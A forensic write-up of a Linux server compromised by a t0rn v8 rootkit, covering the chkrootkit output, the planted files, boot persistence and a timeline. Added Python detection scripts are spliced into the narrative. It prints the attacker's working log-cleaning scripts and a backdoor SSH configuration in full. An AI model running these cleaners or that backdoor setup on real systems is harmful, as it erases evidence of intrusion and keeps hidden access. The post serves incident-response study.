Possible t0rn v8 (or variation) rootkit installed
What do you do when you discover that a GNU/Linux server has been compromised?
In this post I will show a short analysis of a server compromised by a rootkit.
The suspicion:
On a server used to "try out" some software, one fine day I came across the following output from the ls command ...
homer:~# ls
ls: unrecognized prefix: do
ls: unparsable value for LS_COLORS environment variable
The proof:
Checking the LS_COLORS environment variable ... nothing abnormal ...
homer:~# echo $LS_COLORS
no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.svgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:
Googling the error output:
And ........??
Many hits about compromised servers ...
Running chkrootkit and analysing its logs, the suspicions were confirmed ...
Here is the chkrootkit log as run on the server:
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not found
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not infected
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not found
Checking `netstat'... INFECTED
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... INFECTED
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... INFECTED
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/lib/init/rw/.mdadm /lib/init/rw/.ramfs
/lib/init/rw/.mdadm
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... nothing found
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for ENYELKM rootkit default files... nothing found
Searching for common ssh-scanners default files... nothing found
Searching for suspect PHP files... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'... You have 97 process hidden for readdir command
You have 99 process hidden for ps command
chkproc: Warning: Possible LKM Trojan installed
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... eth0: not promisc and no PF_PACKET sockets
eth1: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)
eth1:0: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)
eth1:teste: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)
eth1:2: PF_PACKET(/usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/dhcpd, /usr/sbin/bandwidthd, /usr/sbin/bandwidthd, /usr/sbin/ipfm)
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted
Checking `chkutmp'... The tty of the following user process(es) were not found
in /var/run/utmp !
! RUID PID TTY CMD
! root 5250 tty3 /sbin/getty 38400 tty3
! root 5253 tty4 /sbin/getty 38400 tty4
! root 5256 tty5 /sbin/getty 38400 tty5
! root 5259 tty6 /sbin/getty 38400 tty6
chkutmp: nothing deleted
chkrootkit reported a possible t0rn v8 (or variation) rootkit installed.
And now, José?
The first action taken was to take the server off the internet ...
The analysis:
Looking for information about t0rn v8 ... the rootkit installs the following files on the server:
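The chkproc lines in the log above ("97 process hidden for readdir command", "99 process hidden for ps command") come from one comparison: PIDs the kernel admits exist versus PIDs that /proc and ps are willing to show. As an added example, not code from the original post or from chkrootkit, here is that check in Python; the collectors only work on Linux, the comparison itself is pure and is what the test exercises.

```python
"""Hidden-process check in the spirit of chkrootkit's chkproc.

A trojaned ps, or an LKM that filters /proc readdir(), can hide a PID,
but kill(pid, 0) is answered by the kernel for every live PID.  Probing
the whole PID range and diffing the three views exposes the hidden ones.
Standard library only."""
import os
import subprocess
from typing import Dict, Iterable, List, Set


def pids_from_proc_readdir() -> Set[int]:
    """PIDs visible through readdir() on /proc, plus thread ids from
    /proc/<pid>/task (threads also answer kill(), so they must count as
    visible or every multithreaded daemon looks 'hidden')."""
    seen: Set[int] = set()
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        seen.add(int(name))
        try:
            seen.update(int(t) for t in os.listdir(f"/proc/{name}/task"))
        except OSError:
            pass
    return seen


def pids_from_ps() -> Set[int]:
    """PIDs reported by the (possibly trojaned) ps binary."""
    out = subprocess.run(["ps", "-e", "-L", "-o", "lwp="], capture_output=True,
                         text=True, check=False).stdout
    return {int(tok) for tok in out.split() if tok.isdigit()}


def pids_from_kill_probe(max_pid: int) -> Set[int]:
    """PIDs the kernel admits exist.  kill(pid, 0) succeeds or fails with
    EPERM (exists, not ours); only ESRCH means 'no such process'."""
    alive: Set[int] = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except PermissionError:
            alive.add(pid)
        except ProcessLookupError:
            pass
    return alive


def hidden_pids(probed: Iterable[int], readdir: Iterable[int],
                ps: Iterable[int]) -> Dict[str, List[int]]:
    """Pure comparison producing chkproc's two counters."""
    probed, readdir, ps = set(probed), set(readdir), set(ps)
    return {"hidden_from_readdir": sorted(probed - readdir),
            "hidden_from_ps": sorted(probed - ps)}


def read_pid_max(default: int = 32768) -> int:
    try:
        with open("/proc/sys/kernel/pid_max") as fh:
            return int(fh.read())
    except OSError:
        return default


if __name__ == "__main__":
    # Live run (Linux only).  A handful of PIDs that start or exit between
    # the scans is normal noise; dozens, as on homer, is not.
    report = hidden_pids(pids_from_kill_probe(read_pid_max()),
                         pids_from_proc_readdir(), pids_from_ps())
    for key, pids in report.items():
        print(f"{key}: {len(pids)} -> {pids[:20]}")
```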
/lib/libsh.so/shrs
/lib/libsh.so/shhk
/lib/libsh.so/shhk.pub
/sbin/ttymon
/sbin/ttyload
/sbin/ifconfig
/usr/lib/libsh/.sniff/shp
/usr/lib/libsh/.sniff/shsniff
/usr/lib/libsh/.bashrc
/usr/lib/libsh/shsb
/usr/lib/libsh/hide
/usr/sbin/lsof
/usr/bin/pstree
/usr/bin/find
/usr/bin/top
/usr/bin/dir
/usr/bin/slocate
/usr/bin/md5sum
/bin/ps
/bin/ls
/bin/netstat
/var/tmp/httpd
Since many of the binaries essential for an analysis had been compromised on the server, the data from the compromised server was analysed on another machine.
With the disk mounted on another server, searching for the files the rootkit might have installed, the following artifacts were found:
# ls /mnt/homer/lib/libsh.so
bash shdcf shhk shhk.pub shrs
# cd /mnt/homer/lib/libsh.so
# file bash
bash: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.1, stripped
# file shdcf
shdcf: ASCII text
# cat shdcf
Port 6969
ListenAddress 0.0.0.0
HostKey /lib/libsh.so/shhk
RandomSeed /lib/libsh.so/shrs
ServerKeyBits 768
LoginGraceTime 600
KeyRegenerationInterval 3600
PermitRootLogin yes
IgnoreRhosts yes
StrictModes yes
QuietMode no
X11Forwarding yes
X11DisplayOffset 10
FascistLogging no
PrintMotd no
KeepAlive yes
SyslogFacility DAEMON
RhostsAuthentication no
RhostsRSAAuthentication yes
RSAAuthentication yes
PasswordAuthentication yes
PermitEmptyPasswords yes
UseLogin no
CheckMail no
# file shhk
shhk: data
# file shhk.pub
shhk.pub: ASCII text, with very long lines
# cat shhk.pub
1024 41 104815528740090300232762682062148731692345617648761884893144749702438178716507602106384467348442332555726272229905090060865518152094220166348851874522827117669256069180699567468232805547620203421525417575684002027686936703327559508891840428578000903598085456851354927023314524854708653799840391129004567592229 root@NoraD
# file shrs
shrs: data
Examining these files leaves no doubt that this is an SSH server.
Looking for more files the rootkit might have installed on the server ....
# ls /mnt/homer/usr/lib/libsh
hide shsb utilz
# cd /mnt/homer/usr/lib/libsh
# file hide
hide: Bourne-Again shell script text executable
# cat hide
#!/bin/bash
echo " Linux Hider v2.0 by mave"
echo " enhanced by me! "
echo "[+] [Shkupi Logcleaner] Removing $1 from the logs........ ."
echo ""
if [ -f /var/log/maillog ]; then
cat /var/log/maillog | grep -v $1 > /tmp/maillog.xz
touch -acmr /var/log/maillog /tmp/maillog.xz
mv -f /tmp/maillog.xz /var/log/maillog
echo "[+] /var/log/maillog ... [done]"
echo ""
fi
if [ -f /var/log/messages ]; then
cat /var/log/messages | grep -v $1 > /tmp/messages.xz
touch -acmr /var/log/messages /tmp/messages.xz
mv -f /tmp/messages.xz /var/log/messages
echo "[+] /var/log/messages ... [done]"
sleep 2
echo ""
fi
if [ -f /var/log/secure ]; then
cat /var/log/secure | grep -v $1 > /tmp/secure.xz
touch -acmr /var/log/secure /tmp/secure.xz
mv -f /tmp/secure.xz /var/log/secure
echo "[+] /var/log/secure ... [done]"
echo ""
fi
if [ -f /var/log/xferlog ]; then
cat /var/log/xferlog | grep -v $1 > /tmp/xferlog.xz
touch -acmr /var/log/xferlog /tmp/xferlog.xz
mv -f /tmp/xferlog.xz /var/log/xferlog
sleep 2
echo "[+] /var/log/lastlog ... [done]"
echo ""
fi
if [ -f /var/log/wtmp ]; then
cat /var/log/wtmp |grep -v $1 > /tmp/wtmp.xz
touch -acmr /var/log/wtmp /tmp/wtmp.xz
mv -f /tmp/wtmp.xz /var/log/wtmp
echo "[+] /var/log/wtmp ... [done]"
echo ""
fi
rm -f /tmp/*.xz
echo " * m i s s i o n a c c o m p l i s h e d *"
echo ""
sleep 2
echo " p.h.e.e.r S.H.c.r.e.w"
echo ""
sleep 5
exit 1
# file shsb
shsb: Bourne-Again shell script text executable
# cat shsb
#!/bin/bash
#
# sauber – by socked [11.02.99]
#
# Usage: sauber
BLK=”
RED=”
GRN=”
YEL=”
BLU=”
MAG=”
CYN=”
WHI=”
DRED=”
DGRN=”
DYEL=”
DBLU=”
DMAG=”
DCYN=”
DWHI=”
RES=”
echo "${BLK}* ${WHI}sauber ${DWHI}by ${WHI}s${BLU}o${DBLU}ck${BLK}ed [${DWHI}07${BLK}.${DWHI}27${BLK}.${DWHI}97${BLK}]${RES}"
if [ $# != 1 ]
then
echo "${BLK}* ${DWHI}Usage${WHI}: "`basename $0`" <${DWHI}string${WHI}>${RES}"
echo " "
exit
fi
echo "${BLK}*${RES}"
echo "${BLK}* ${DWHI}Cleaning logs.. This may take a bit depending on the size of the logs.${RES}"
WERD=$(/bin/ls -F /var/log | grep -v "/" | grep -v "*" | grep -v ".tgz" | grep -v ".gz" | grep -v ".tar" | grep -v "lastlog" | grep -v "utmp" | grep -v "wtmp" | grep -v "@")
for fil in $WERD
do
line=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
echo -n "${BLK}* ${DWHI}Cleaning ${WHI}$fil ($line ${DWHI}lines${WHI})${BLK}...${RES}"
grep -v $1 /var/log/$fil > new
touch -r /var/log/$fil new
mv -f new /var/log/$fil
newline=$(wc -l /var/log/$fil | awk -F ' ' '{print $1}')
let linedel=$(($line-$newline))
echo "${WHI}$linedel ${DWHI}lines removed!${RES}"
done
killall -HUP syslogd
echo "${BLK}* ${DWHI}Alles sauber mein Meister !'Q%&@$! ${RES}"
# file utilz/
utilz/: directory
# cd utilz/
# ls
mirk.tgz synscan.tgz
# tar -tvzf mirk.tgz
drwxrwxr-x burim/burim 0 2003-04-06 08:58 mirk/
-rw-rw-r-- burim/burim 4320 2001-12-30 08:10 mirk/idents
-rw-rw-r-- burim/burim 4320 2001-12-30 08:09 mirk/nicks
-rw-rw-r-- burim/burim 2021 2003-04-06 08:57 mirk/realnames
-rwx------ burim/burim 40 2002-02-21 05:19 mirk/mf
-rwx------ burim/burim 268 2002-02-21 05:19 mirk/mfclean
-rwxrwxr-x burim/burim 97845 2002-02-21 05:30 mirk/mirkforce
-rwx------ burim/burim 3232 2002-05-24 06:26 mirk/ethclean
-rwxr-xr-x burim/burim 21924 2003-04-17 01:11 mirk/oidentd
# tar -tvzf synscan.tgz
drwxr-xr-x burim/burim 0 2003-04-06 08:54 synscan/
-rw-r--r-- burim/burim 19 2001-02-15 20:58 synscan/ircd.txt
-rw-r--r-- burim/burim 81518 1999-01-13 21:44 synscan/libpcap.a
-rw-r--r-- burim/burim 13 2000-05-15 18:05 synscan/news.txt
-rw-r--r-- burim/burim 165 2003-04-06 08:54 synscan/rpcs.txt
-rwxr-xr-x burim/burim 31232 2003-04-17 01:12 synscan/synscan
-rwxr-xr-x burim/burim 38420 2003-04-17 01:12 synscan/upscan
-rwxr-xr-x burim/burim 3884 2003-04-17 01:12 synscan/numip
-rwxr-xr-x burim/burim 6356 2003-04-17 01:12 synscan/host2ip
-rwxr-xr-x burim/burim 19644 2003-04-06 08:54 synscan/nscan
Among the last files analysed we have scripts that do the dirty work of cleaning the log files, an IRC server and synscan (network testing tool and active OS fingerprinter).
Looking for how the rootkit was started at server boot ....
A simple check of /etc/inittab gave us the answer:
# cat /mnt/homer/etc/inittab
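Both cleaners above rewrite a log with grep -v, copy the old atime/mtime onto the new file with touch (-acmr or -r) and then mv -f it into place. None of those steps can set ctime: the kernel bumps it on every utime() and rename(), so a log whose ctime is far newer than its mtime has been rewritten after its last legitimate append. As an added example, not from the original post, here is that check in Python against a mounted image; the sample image, the log lines in it and the simulated cleaner are constructed here for the test.

```python
"""Detect grep/touch/mv log rewriting by the ctime-vs-mtime gap.

An append-only log has ctime and mtime moving together.  The `hide`
and `shsb` scripts restore mtime with touch but cannot touch ctime, so
the rewritten file keeps an old mtime and gets a ctime of 'now'.
POSIX semantics assumed (on Linux ctime is the inode change time)."""
import os
import stat
import tempfile
import time
from typing import List, Tuple

# Logs the two scripts target, relative to the mount point.
TARGET_LOGS = ["var/log/messages", "var/log/secure", "var/log/maillog",
               "var/log/xferlog", "var/log/wtmp"]


def ctime_mtime_skew(path: str) -> float:
    """Seconds by which ctime exceeds mtime (about 0 for an untouched log)."""
    st = os.lstat(path)
    return st.st_ctime - st.st_mtime


def suspicious_logs(mount: str, threshold: float = 60.0) -> List[Tuple[str, float]]:
    """(relative path, skew) for regular target logs whose ctime is more
    than `threshold` seconds after their mtime."""
    hits = []
    for rel in TARGET_LOGS:
        full = os.path.join(mount, rel)
        try:
            st = os.lstat(full)
        except FileNotFoundError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        skew = st.st_ctime - st.st_mtime
        if skew > threshold:
            hits.append((rel, skew))
    return hits


def simulate_cleaner(mount: str, rel: str, drop: str) -> None:
    """Constructed helper: do to one log exactly what `hide` does
    (filter lines, copy timestamps like touch -acmr, replace like mv -f)."""
    full = os.path.join(mount, rel)
    old = os.lstat(full)
    tmp = full + ".xz"
    with open(full) as src, open(tmp, "w") as dst:
        dst.writelines(line for line in src if drop not in line)
    os.utime(tmp, (old.st_atime, old.st_mtime))   # touch -acmr equivalent
    os.replace(tmp, full)                          # mv -f equivalent


def build_sample_image() -> str:
    """Constructed sample mount: `messages` freshly appended and left alone,
    `secure` last appended a week ago and then run through the cleaner."""
    mount = tempfile.mkdtemp(prefix="homer-")
    os.makedirs(os.path.join(mount, "var/log"))
    sample = ("May 27 15:19 homer sshd: session opened for user zabbix\n"
              "May 27 15:23 homer sshd: session opened for user root\n")
    for rel in ("var/log/messages", "var/log/secure"):
        with open(os.path.join(mount, rel), "w") as fh:
            fh.write(sample)
    week_ago = time.time() - 7 * 86400
    secure = os.path.join(mount, "var/log/secure")
    os.utime(secure, (week_ago, week_ago))       # pretend: old last append
    simulate_cleaner(mount, "var/log/secure", "zabbix")
    return mount
```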
# /etc/inittab: init(8) configuration.
# $Id: inittab,v 1.91 2002/01/25 13:35:21 miquels Exp $
# The default runlevel.
id:2:initdefault:
# Boot-time system configuration/initialization script.
# This is run first except when booting in emergency (-b) mode.
si::sysinit:/etc/init.d/rcS
# What to do in single-user mode.
~~:S:wait:/sbin/sulogin
# /etc/init.d executes the S and K scripts upon change
# of runlevel.
#
# Runlevel 0 is halt.
# Runlevel 1 is single-user.
# Runlevels 2-5 are multi-user.
# Runlevel 6 is reboot.
l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6
# Normally not reached, but fallthrough in case of emergency.
z6:6:respawn:/sbin/sulogin
# What to do when CTRL-ALT-DEL is pressed.
ca:12345:ctrlaltdel:/sbin/shutdown -t1 -a -r now
# Action on special keypress (ALT-UpArrow).
#kb::kbrequest:/bin/echo "Keyboard Request--edit /etc/inittab to let this work."
# What to do when the power fails/returns.
pf::powerwait:/etc/init.d/powerfail start
pn::powerfailnow:/etc/init.d/powerfail now
po::powerokwait:/etc/init.d/powerfail stop
#
# The "id" field MUST be the same as the last
# characters of the device (after "tty").
#
# Format:
# :::
#
# Note that on most Debian systems tty7 is used by the X Window System,
#
#
#
SV:123456:respawn:/usr/local/bin/svscanboot
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload
# /sbin/getty invocations for the runlevels.
# so if you want to add more getty's go ahead but skip tty7 if you run X.
1:2345:respawn:/sbin/getty 38400 tty1
2:23:respawn:/sbin/getty 38400 tty2
3:23:respawn:/sbin/getty 38400 tty3
4:23:respawn:/sbin/getty 38400 tty4
5:23:respawn:/sbin/getty 38400 tty5
6:23:respawn:/sbin/getty 38400 tty6
# Example how to put a getty on a serial line (for a terminal)
#T0:23:respawn:/sbin/getty -L ttyS0 9600 vt100
#T1:23:respawn:/sbin/getty -L ttyS1 9600 vt100
# Example how to put a getty on a modem line.
#T3:23:respawn:/sbin/mgetty -x0 -s 57600 ttyS3
# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
0:2345:once:/usr/sbin/ttyload # the rootkit's magic line ...
ttyload turns out to be a one-line script that launches two binaries:
# file /mnt/homer/usr/sbin/ttyload
/mnt/homer/usr/sbin/ttyload: ASCII text
# cat /mnt/homer/usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
# file /mnt/homer/sbin/ttyload
/mnt/homer/sbin/ttyload: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, corrupted section header size
# file /mnt/homer/sbin/ttymon
/mnt/homer/sbin/ttymon: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, stripped
But how?
Well, now what remains is to find out how the server was compromised ...
Going by the dates of the created files, we use our old friend "find" to look for files modified from one day before the artifacts were installed ...
# ls -l /mnt/homer/sbin/ttyload
-rwxr-xr-x 1 122 114 212747 2007-01-30 16:51 /mnt/homer/sbin/ttyload
Creating a marker file for the find search:
# touch -d "26 may 2009 15:30:00" /tmp/date_marker
# find . -newer /tmp/date_marker -exec ls -l {} \; > /tmp/arquivos-modificados-a-partir-de-2009-05-26-com-data.txt
Looking for files from the same day and hour as the artifacts:
# grep "2009-05-27 15:.." /tmp/arquivos-modificados-a-partir-de-2009-05-26.txt
drwxr-xr-x 2 root root 4096 2009-05-27 15:30 sbin
drwxr-xr-x 6 root root 4096 2009-05-27 15:30 libsh
-rwxr-xr-x 1 root root 75748 2009-05-27 15:30 find
-rwxr-xr-x 1 root root 58380 2009-05-27 15:30 ifconfig
-rwxr-xr-x 1 root root 77352 2009-05-27 15:30 ls
-rwxr-xr-x 1 root root 22116 2009-05-27 15:30 md5sum
-rwxr-xr-x 1 root root 98188 2009-05-27 15:30 netstat
-rwxr-xr-x 1 root root 65292 2009-05-27 15:30 ps
-rwxr-xr-x 1 root root 14060 2009-05-27 15:30 pstree
-rwxr-sr-x 1 root root 31308 2009-05-27 15:30 slocate
-rwxr-xr-x 1 root root 49636 2009-05-27 15:30 top
-rwxr-xr-x 1 root root 65292 2009-05-27 15:30 ./usr/lib/libsh/.backup/ps
-rwxr-xr-x 1 root root 49636 2009-05-27 15:30 ./usr/lib/libsh/.backup/top
-rwxr-xr-x 1 root root 58380 2009-05-27 15:30 ./usr/lib/libsh/.backup/ifconfig
-rwxr-xr-x 1 root root 98188 2009-05-27 15:30 ./usr/lib/libsh/.backup/netstat
-rwxr-xr-x 1 root root 22116 2009-05-27 15:30 ./usr/lib/libsh/.backup/md5sum
-rwxr-xr-x 1 root root 75748 2009-05-27 15:30 ./usr/lib/libsh/.backup/find
-rwxr-xr-x 1 root root 77352 2009-05-27 15:30 ./usr/lib/libsh/.backup/ls
-rwxr-sr-x 1 root root 31308 2009-05-27 15:30 ./usr/lib/libsh/.backup/slocate
-rwxr-xr-x 1 root root 14060 2009-05-27 15:30 ./usr/lib/libsh/.backup/pstree
lrwxrwxrwx 1 root root 20 2009-05-27 15:30 libncurses.so.4 -> /lib/libncurses.so.5
drwxr-xr-x 2 root root 4096 2009-05-27 15:30 libsh.so
lrwxrwxrwx 1 root root 20 2009-05-27 15:30 ./lib/libncurses.so.4 -> /lib/libncurses.so.5
-rwxr-xr-x 1 root root 677184 2009-05-27 15:30 bash
-rw-r--r-- 1 root 114 478 2009-05-27 15:30 shdcf
-rwxr-xr-x 1 root root 677184 2009-05-27 15:30 ./lib/libsh.so/bash
-rw-r--r-- 1 root 114 478 2009-05-27 15:30 ./lib/libsh.so/shdcf
-rw-r--r-- 1 1003 1003 24748 2009-05-27 15:23 2007.tgz
drwxr-xr-x 7 507 507 12288 2009-05-27 15:30 of
-rwxr-xr-x 1 1003 1003 8509 2009-05-27 15:24 xpl
-rw------- 1 1003 1003 448 2009-05-27 15:32 ./home/zabbix/.bash_history
-rwxr-xr-x 1 1003 1003 8509 2009-05-27 15:24 ./home/zabbix/xpl
-rw-r--r-- 1 1003 1003 24748 2009-05-27 15:23 ./home/zabbix/2007.tgz
-rw-r----- 1 root root 0 2009-05-27 15:26 ./var/lib/dpkg/lock
-rw-r--r-- 1 www-data www-data 2229 2009-05-27 15:43 7b6767c5dca52161e021bc954faeab5d
-rw-r--r-- 1 www-data www-data 2347 2009-05-27 15:08 ba1386c0067dd751785dde2403b32755
-rw-r--r-- 1 www-data www-data 2229 2009-05-27 15:43 ./var/www/streber/_tmp/7b6767c5dca52161e021bc954faeab5d
-rw-r--r-- 1 www-data www-data 2347 2009-05-27 15:08 ./var/www/streber/_tmp/ba1386c0067dd751785dde2403b32755
-rw-r--r-- 1 root root 1354 2009-05-27 15:30 inetd.conf
-rw-r--r-- 1 root root 25292 2009-05-27 15:30 ld.so.cache
-rw------- 1 root root 1666 2009-05-27 15:19 shadow-
-rw------- 1 root root 1666 2009-05-27 15:19 ./etc/shadow-
-rw-r--r-- 1 root root 25292 2009-05-27 15:30 ./etc/ld.so.cache
-rw-r--r-- 1 root root 1354 2009-05-27 15:30 ./etc/inetd.conf
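The find -newer /tmp/date_marker step above, done offline with os.walk on the mounted image, as an added example that is not part of the original post. It lists every entry whose mtime falls in a window around the install time and marks the ones that match the t0rn v8 file list quoted earlier, so the 15:30 install burst, the .backup copies of the original binaries and the attacker's staging files in the zabbix home show up together. The sample image and its timestamps are constructed here to mirror the listing above.

```python
"""Offline modification-window timeline for a mounted disk image."""
import os
import tempfile
from datetime import datetime
from typing import List, Tuple

# Paths from the t0rn v8 file list in the post, relative to the mount.
T0RN_PATHS = {
    "lib/libsh.so/shrs", "lib/libsh.so/shhk", "lib/libsh.so/shhk.pub",
    "sbin/ttymon", "sbin/ttyload", "sbin/ifconfig",
    "usr/lib/libsh/.sniff/shp", "usr/lib/libsh/.sniff/shsniff",
    "usr/lib/libsh/.bashrc", "usr/lib/libsh/shsb", "usr/lib/libsh/hide",
    "usr/sbin/lsof", "usr/bin/pstree", "usr/bin/find", "usr/bin/top",
    "usr/bin/dir", "usr/bin/slocate", "usr/bin/md5sum",
    "bin/ps", "bin/ls", "bin/netstat", "var/tmp/httpd",
}


def parse_ts(text: str) -> float:
    """'YYYY-MM-DD HH:MM' in local time -> epoch seconds."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M").timestamp()


def modified_in_window(mount: str, start: float, end: float) -> List[Tuple[str, float, bool]]:
    """(relative path, mtime, known t0rn path?) for every entry with
    start <= mtime <= end, oldest first.  lstat() is used so a dropped
    symlink such as libncurses.so.4 is reported itself, not its target."""
    hits = []
    for root, dirs, files in os.walk(mount):
        for name in dirs + files:
            full = os.path.join(root, name)
            try:
                mtime = os.lstat(full).st_mtime
            except OSError:
                continue
            if start <= mtime <= end:
                rel = os.path.relpath(full, mount)
                hits.append((rel, mtime, rel in T0RN_PATHS))
    hits.sort(key=lambda h: h[1])
    return hits


def format_hits(hits) -> List[str]:
    return [f"{datetime.fromtimestamp(m):%Y-%m-%d %H:%M} "
            f"{'T0RN' if known else '    '} {rel}" for rel, m, known in hits]


def build_sample_image() -> str:
    """Constructed sample mount with the timestamps seen in the listing."""
    mount = tempfile.mkdtemp(prefix="homer-")

    def put(rel: str, when: str) -> None:
        full = os.path.join(mount, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("x")
        os.utime(full, (parse_ts(when), parse_ts(when)))

    put("home/zabbix/2007.tgz", "2009-05-27 15:23")
    put("home/zabbix/xpl", "2009-05-27 15:24")
    put("bin/ps", "2009-05-27 15:30")
    put("sbin/ttyload", "2009-05-27 15:30")
    put("usr/lib/libsh/.backup/ps", "2009-05-27 15:30")
    put("etc/hostname", "2009-04-01 10:00")          # outside the window
    return mount
```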
Strange things in the Zabbix user's home ...
A simple Google search for "Zabbix + Vulnerability"
http://www.google.com.br/search?hl=pt-BR&client=firefox-a&rls=com.ubuntu%3Apt-BR%3Aunofficial&hs=9cR&q=zabbix+vulnerability&btnG=Pesquisar&meta=
And ... ???
